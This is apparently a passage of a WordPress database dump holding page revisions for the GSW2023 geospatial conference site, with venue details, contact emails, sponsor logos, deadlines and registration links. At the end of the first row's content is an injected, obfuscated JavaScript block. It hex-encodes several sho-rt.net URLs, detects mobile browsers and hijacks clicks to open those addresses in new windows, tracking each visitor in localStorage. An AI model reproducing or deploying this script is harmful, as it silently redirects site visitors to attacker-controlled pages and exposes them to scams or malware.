el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-22 12:39:58','2023-04-22 12:39:58','',3066,'https://gsw2023.com/?p=4091',0,'revision','',0),
(4092,1,'2023-04-22 12:40:50','2023-04-22 12:40:50','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1682167065507{margin-top: -50px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" 